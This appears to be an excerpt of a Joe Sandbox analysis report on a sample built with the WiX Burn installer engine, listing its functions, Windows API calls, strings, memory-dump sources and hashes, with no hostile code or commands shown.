                                                                                                                                                                  • Opcode ID: ced1bc192ac71ebf246fd3fb373c7c5a2932d08733ce3dd06b5e2444de8f859a
                                                                                                                                                                  • Instruction ID: bc215a241c70d9c8a2bfa50ed5958f545b806694fe4469f641aa9b41d4225c0b
                                                                                                                                                                  • Opcode Fuzzy Hash: ced1bc192ac71ebf246fd3fb373c7c5a2932d08733ce3dd06b5e2444de8f859a
                                                                                                                                                                  • Instruction Fuzzy Hash: CF224671E0021AEFDF15CF98C981EAEBBB5BF88300F14416AE905AB251E771AD51DB90
                                                                                                                                                                  Function 009642FB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                  • Opcode ID: ea6c862930b4a789fb449e1851e1434557b5f524105ecbd77b10328a16d4c665
                                                                                                                                                                  • Instruction ID: 5405db24fb8d2ae5b23e2398bc81b626e8ea6e07c4006c9157fda540d2e97636
                                                                                                                                                                  • Opcode Fuzzy Hash: ea6c862930b4a789fb449e1851e1434557b5f524105ecbd77b10328a16d4c665
                                                                                                                                                                  • Instruction Fuzzy Hash: 17D25971E086298FDB65CE68DD407EAB7B9FB84305F1541EAD40DE3240EB78AE818F41
                                                                                                                                                                  Function 0092E72A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 0092E7D8
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 0092E871
                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 0092E880
                                                                                                                                                                    • Part of subcall function 00915C81: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 00915CE9
                                                                                                                                                                    • Part of subcall function 00915C81: GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915CF4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNext
                                                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                                                  • API String ID: 3458812364-2528915496
                                                                                                                                                                  • Opcode ID: 335c8015416aef7527ec977c5ca458c521695ef6f3903761e6edb098257bdf0e
                                                                                                                                                                  • Instruction ID: 70771ea1931d63d328e165bd16750c380050cfed1203bd970b6bacd72ba7cb6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 335c8015416aef7527ec977c5ca458c521695ef6f3903761e6edb098257bdf0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41A071A0023CAADB20AB61EC89BEE77BCAF84715F0041A5F948E6195D7709EC4DF54
                                                                                                                                                                  Function 00919360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 2054405381-561454448
                                                                                                                                                                  • Opcode ID: 38b9f512474633c5d49c2191ed4217f028e02100ac9c26db50f2cce02f3f8755
                                                                                                                                                                  • Instruction ID: 415de6cadb448a48d6ae903f155d097ae9865323c468736552160ebac4d84e8a
                                                                                                                                                                  • Opcode Fuzzy Hash: 38b9f512474633c5d49c2191ed4217f028e02100ac9c26db50f2cce02f3f8755
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E112372B4032C77E720AA158C4AFEF72AC9B44B64F010161FD55FB3C2E6A4ED8186E0
                                                                                                                                                                  Function 009314C4 Relevance: 7.8, Strings: 6, Instructions: 315COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 0093156F, 0093187F
                                                                                                                                                                  • ALL, xrefs: 00931581
                                                                                                                                                                  • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 009315A3
                                                                                                                                                                  • Failed to check the dictionary of ignored dependents., xrefs: 00931711
                                                                                                                                                                  • Failed to add the package provider key "%ls" to the planned list., xrefs: 0093186D
                                                                                                                                                                  • Failed to build the list of ignored dependents., xrefs: 0093155D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                  • API String ID: 0-71972248
                                                                                                                                                                  • Opcode ID: 0b4f0b78751e74cd0ee8010a94a505b77a7890e89daac9a9b13a47ad5709b738
                                                                                                                                                                  • Instruction ID: 5074510d7fa71483d91f41b8e26a2f1f6b188e2c64402935e6595fde5a6cbd94
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4f0b78751e74cd0ee8010a94a505b77a7890e89daac9a9b13a47ad5709b738
                                                                                                                                                                  • Instruction Fuzzy Hash: F8C19871D00204DFEB20CFA4C885BAAB7F9FF98319F14452EE51A67261D7B09881CF54
                                                                                                                                                                  Function 0097BA41 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,0000000C), ref: 0097BA96
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,0000000C,?), ref: 0097BAA8
                                                                                                                                                                  Strings
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0097BAF3
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 0097BA7F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                  • API String ID: 1772835396-395410266
                                                                                                                                                                  • Opcode ID: 0a7583875e1d81023e66de5bb54e91d1ea59ed2521f2c4ead44802024648a212
                                                                                                                                                                  • Instruction ID: 745225bf695ad5666721e776877d166469d4e56d54c113b4edfc0e53f6b7b65f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a7583875e1d81023e66de5bb54e91d1ea59ed2521f2c4ead44802024648a212
                                                                                                                                                                  • Instruction Fuzzy Hash: BC210CA2900128EADB20DBA98C05FBFB3FDEB8C711F004456F945D6080E638AE80D770
                                                                                                                                                                  Function 009498F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00949898,00000000,00000003), ref: 00949910
                                                                                                                                                                  • GetLastError.KERNEL32(?,00949898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094991A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                  • String ID: Failed to set service start type.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                  • API String ID: 1456623077-1893245463
                                                                                                                                                                  • Opcode ID: 6b261ed2c1317f1223c8f908dc8454c0a5c8f8d9921cef91b1899ec820ccd0f0
                                                                                                                                                                  • Instruction ID: 3ee0a8a30545921d3e1f643ac443fd8ba6b5a298289b4c289b761778594f5bf6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b261ed2c1317f1223c8f908dc8454c0a5c8f8d9921cef91b1899ec820ccd0f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0E933A4513933D731254A5C49FAF7E5CDB46BB1F114329BE68FA2D1E5618C4092F0
                                                                                                                                                                  Function 0097C535 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0097C546
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0097C561
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 401686933-2746444292
                                                                                                                                                                  • Opcode ID: 3be5f92f257beae2850ec8b6198e6fb575d5800a1b7244d84d58bb94ea0bfb9a
                                                                                                                                                                  • Instruction ID: 6a60696ae0492131aaefc7deacc65115a3033efab9728fa2fd3b5f39b31ccc6e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3be5f92f257beae2850ec8b6198e6fb575d5800a1b7244d84d58bb94ea0bfb9a
                                                                                                                                                                  • Instruction Fuzzy Hash: B501D473A141096BDB14DE29DC05BED7BAEAFC8324F08C164BD5DDB144E634E9418680
                                                                                                                                                                  Function 0092ECE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00916305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
                                                                                                                                                                    • Part of subcall function 00916305: GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092ED2D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed create acquisition folder., xrefs: 0092ED04
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092ED16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDecryptDirectoryErrorFileLast
                                                                                                                                                                  • String ID: Failed create acquisition folder.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 4153065963-4185204549
                                                                                                                                                                  • Opcode ID: a9210808fae0667e0624153e7ef8c50d202133a662fbfae61efeeb236e681ca1
                                                                                                                                                                  • Instruction ID: 40f6c957b1c16fa40142e53ed01ca9a2affffd5322b9fd104dc1ad277866032b
                                                                                                                                                                  • Opcode Fuzzy Hash: a9210808fae0667e0624153e7ef8c50d202133a662fbfae61efeeb236e681ca1
                                                                                                                                                                  • Instruction Fuzzy Hash: 38E0D83278422973D6212659EC07FCAFA08EFA0F61F000122F708A52E1D6E0786047E1
                                                                                                                                                                  Function 0095D3EE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0095D4E6
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0095D4F0
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0095D4FD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                  • Opcode ID: 5ce34c8e91056baca0f4505c6d825a833c1231b72409de79724b711902b6051e
                                                                                                                                                                  • Instruction ID: fd477b83b337738dfb23a25c4191f3c7cd9fe57811e620839fa570a185d1dfe3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ce34c8e91056baca0f4505c6d825a833c1231b72409de79724b711902b6051e
                                                                                                                                                                  • Instruction Fuzzy Hash: A831E37590522C9BCB21DF65D889B8DBBB8BF48311F5041EAE80CA72A0E7709F858F44
                                                                                                                                                                  Function 00969398 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,feclient.dll,?,00000008,?,?,00969393,0097E878,?,00000008,?,?,00968F96,00000000), ref: 009695C5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                  • String ID: feclient.dll
                                                                                                                                                                  • API String ID: 3997070919-3074931424
                                                                                                                                                                  • Opcode ID: 33439d9adf3accd3e904e4a4f3d9e649126f9813de63dbda50494e823e867147
                                                                                                                                                                  • Instruction ID: fcb3e26ec045160c815e0d1810f7afd7f3de99e2af4d266ae5df62991183ab32
                                                                                                                                                                  • Opcode Fuzzy Hash: 33439d9adf3accd3e904e4a4f3d9e649126f9813de63dbda50494e823e867147
                                                                                                                                                                  • Instruction Fuzzy Hash: 02B16F31210609DFD715CF28C48AB657BE8FF45364F258699E8DACF2A1C735E992CB40
                                                                                                                                                                  Function 0096B493 Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096B523: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0096B4C2,?), ref: 0096B5EF
                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0096B4E6
                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0096B4F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2114926846-0
                                                                                                                                                                  • Opcode ID: c043fa63816e49da097d9d43b8a1d0b537132726706ea4a83504b5c71ce15271
                                                                                                                                                                  • Instruction ID: 0516f43263feebc263dbd614c8d2e3144efa142d8375c1be90851e8dc2ed9a76
                                                                                                                                                                  • Opcode Fuzzy Hash: c043fa63816e49da097d9d43b8a1d0b537132726706ea4a83504b5c71ce15271
                                                                                                                                                                  • Instruction Fuzzy Hash: D0115BB190021AAFDF20DFA4CC85BAFB7FCFF08344F500829A546E6181E7709A84DB61
                                                                                                                                                                  Function 0097343B Relevance: 3.0, APIs: 2, Instructions: 43fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00973482
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 45fe4095ca4a797b0657f98d24899d170b890e4cbb4239eb2e7dbc51134e6bec
                                                                                                                                                                  • Instruction ID: f41f6d77e3e50e581993ac9e9842e6e47dac27bef091334be175fb76a4e83124
                                                                                                                                                                  • Opcode Fuzzy Hash: 45fe4095ca4a797b0657f98d24899d170b890e4cbb4239eb2e7dbc51134e6bec
                                                                                                                                                                  • Instruction Fuzzy Hash: 2401F972600208ABDB10EF6ADD89DABB7ACEFC5315F004155F81CD3150C6349E8D8750
                                                                                                                                                                  Function 00957255 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0095726B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                  • Opcode ID: 94125615471e52abe2a90bcc9fdd8896d0e4d89722660200e0a8545537c203d8
                                                                                                                                                                  • Instruction ID: 9dcc9b58ec57330085413140d5e4f57167172777aa30cfa53de61789b4e437de
                                                                                                                                                                  • Opcode Fuzzy Hash: 94125615471e52abe2a90bcc9fdd8896d0e4d89722660200e0a8545537c203d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 66515EB1A18215CBDB24CF9AE8857AABBF5FB48315F14846AD805EB360D3749A04DF90
                                                                                                                                                                  Function 0095C80C Relevance: 1.6, Strings: 1, Instructions: 385COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
